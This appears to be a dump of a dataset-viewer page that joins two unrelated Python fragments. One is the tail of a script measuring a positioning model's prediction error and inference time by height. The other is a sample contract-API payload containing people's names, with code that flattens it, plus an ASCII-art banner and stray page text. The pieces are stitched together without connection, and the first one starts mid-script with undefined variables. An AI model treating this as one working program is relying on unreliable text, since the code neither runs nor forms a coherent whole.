for i in range(len(data_value)):
    x = np.expand_dims(data_value[i], axis=0)  # add batch dimension
    time_start = time.time()
    predictation_i = model.predict(x)
    time_end=time.time()
    time_list.append(time_end-time_start)
    prediction.append(predictation_i)
    # Positioning error = Euclidean norm of (label - prediction).
    loss_i = label_value[i] - predictation_i
    loss_i = np.linalg.norm(loss_i)
    loss.append(loss_i)
    print("*"*50,'\n step: %d'% i)
    print("the real value is: ", label_value[i])
    print("prediction value is : ", predictation_i)
    print("posisitoning error is : %f"%loss_i)
print("the mean loss is :%f" % (np.mean(loss)))
dataframe = pd.DataFrame({"test_loss":loss})
dataframe.to_csv(newpath + 'MPE.csv')
# Group errors by height: assumes the test set is ordered as 9 blocks of 100
# samples each, one block per height, with the height in label column 2 —
# TODO confirm against how test_labels_height.csv is generated.
loss_height = []
meanloss_height = []
height = []
for i in range(9):
    height.append(test_labels[i*100,2])
    axis_i = np.arange(i*100, (i+1)*100)
    loss_height.append(np.array(loss)[axis_i])
    meanloss_height.append(np.mean(loss_height[i]))
dataframe = pd.DataFrame({"height":height,"test_loss_mean":meanloss_height})
dataframe.to_csv(newpath + 'MPE_height.csv')
# Mean per-sample inference time in seconds.
print(np.mean(time_list))
|
# Sample API payload: one page of a paginated contract listing. Each entry in
# data.currentItems carries its products ("contractProducts") and per-employee
# commissions. All scalar values arrive as strings.
# NOTE(review): key 'expriedDate' is misspelled upstream — kept verbatim
# because consumers look up the literal key.
a = {
    "code":1,
    "data":
    {
        "totalPage":139,
        "currentPage":1,
        "totalItem":13894,
        "itemCountPerPage":100,
        "currentItems":
        [
            {
                'expriedDate': '2017-05-24',
                'startDate': '2016-05-24',
                'createdByName': 'Pham Xuan Hung',
                'service': None,
                'type': 'Ki mi',
                'status': 'Duyet',
                'contractProducts':
                [
                    {
                        'months': '12',
                        'expirationDate': '2017-05-24',
                        'price': '125370',
                        'productId': '120',
                        'discount': None,
                        'quantity': '1',
                        'vat': None
                    },
                    {
                        'months': '12',
                        'expirationDate': '2017-05-24',
                        'price': '125370',
                        'productId': '120',
                        'discount': None,
                        'quantity': '1',
                        'vat': None
                    }
                ],
                'id': '8628',
                'paid': None,
                'accountName': 'Anh Tran Van Hung',
                'accountId': '2884',
                'value': '1504440',
                'commissions':
                [
                    {
                        'employeeName': 'Pham Xuan Hung',
                        'commission': '1504440',
                        'productId': '120',
                        'employeeId': '580',
                        'productName': 'Vchat'
                    },
                    {
                        'employeeName': 'Pham Xuan Hung',
                        'commission': '1504440',
                        'productId': '123',
                        'employeeId': '6543',
                        'productName': 'kubin'
                    }
                ],
                'leadId': '53322',
                'departmentId': '453',
                'endDate': '2017-05-24',
                'createdDateTime': '2016-05-24 09:34:37',
                'companyId': '315'
            }
        ]
    }
}
# Flatten each (contract item, commission) pair into one row:
# [date, department_id, type, company_id, product_id, product_name, value].
arr_hd_ifo = []
for item in a['data']['currentItems']:
    created_date = item['createdDateTime'].split(' ')[0]
    for commission in item['commissions']:
        arr_hd_ifo.append([
            created_date,
            item['departmentId'],
            item['type'],
            item['companyId'],
            commission['productId'],
            commission['productName'],
            item['value'],
        ])
# Company lookup table keyed by companyId (string). Both sample entries point
# at the same company record.
b = {
    'data':
    {
        '335':
        {
            'name': 'Stylelap',
            'id': '335',
            'status': '2',
            'parentId': '324'
        },
        '4463':
        {
            'name': 'Stylelap',
            'id': '335',
            'status': '2',
            'parentId': '324'
        }
    }
}
# Department/room lookup table keyed by departmentId (string).
c = {
    'data':
    {
        '557':
        {
            'name': 'Nhóm KD1',
            'id': '557',
            'status': '1',
            'parentId': '556'
        }
    }
}
# Enrich each row with the company name (lookup of companyId at index 3 in b)
# and the department/room name (lookup of departmentId at index 1 in c);
# missing lookups append an empty string.
for row in arr_hd_ifo:
    company = b['data'].get(row[3])
    room = c['data'].get(row[1])
    company_name = company['name'] if company is not None else ''
    room_name = room['name'] if room is not None else ''
    row.extend((company_name, room_name))
print(arr_hd_ifo)
def process_data_func():
    """Placeholder for future data-processing logic; intentionally a no-op."""
    return None
# Decorative ASCII-art banner printed at the end of the run; purely cosmetic.
print('')
print ('K_K_K_K K_K_K_K B_B_B')
print ('K K K K B B')
print ('K K K K B B I')
print ('K K K K B B I I')
print ('K K K K B B I')
print ('K K K K B B')
print ('K K U_U_U U_U_U B B B_B_B_B I_I_I N_N_N N_N_N')
print ('K K K K U U U U B B B B I I N NN N N')
print ('K K K K U U U U B B B B I I N NNN N N P_P_PP K_K K_K')
print ('K K K K U U U U B B B B I I N N NN N N P P PP K K K K EEE R_RR_RR')
print ('K K K K U U U B B B B I I N N NN N N P P_PP A_A_AA R_RR_RR K K K EE EE R R R')
print ('K K K K U U B B B B I I N N NNN N P P AA AA R R R K K K K EE_EEE R R')
print ('K_K_K_K K_K_K_K U_U_U_U_U_U B_B_B B_B_B_B I_I_I N_N_N NN_N_N P_P A_A_AA;; R_R K_K K_K E_E_E_E R_R')
print ('')
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.